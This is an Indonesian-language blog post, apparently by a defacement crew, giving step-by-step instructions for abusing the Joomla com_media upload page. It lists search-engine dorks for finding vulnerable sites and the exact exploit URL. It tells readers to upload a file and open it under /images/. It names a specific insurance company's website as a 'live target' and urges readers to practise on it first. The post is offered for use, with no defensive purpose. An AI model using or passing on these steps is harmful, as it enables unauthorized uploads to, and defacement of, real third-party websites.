![Attacker Alone Cyber](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqJg7208Lju0KE_lqbvzytjfj3q-b9VYOo_2fMEcloiFsCOqyZNUOfWa0yfe8R1FDpbeJWajatru7jqooA1_3OaXHVAE-hd0ldXAkspy1XFAp8Q_wkvUzso9oedcDF98iJFlpvodudbdE/s320/aac.jpg" width="50" height="10">)
Bahan :
1. Dork : - inurl:com_media site:com
- inurl:com_media intext:"Upload"
2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Upload'an : Format .txt 😁
Live Target : http://www.james-insurance.co.uk/
Step by Step :
gunakan Live Targert dulu untuk Uji Coba 😁
1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk
2. Pilih salah satu Web
3. Masukkan Exploit
http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
4. Lalu Upload file dalam tempat upload ( format .txt )
Akses shell ?
Tambahkan : /images/namafile.txt
contoh : http://www.james-insurance.co.uk/images/fac.txt
Nanti Jadi Gini Hasilnyaa..
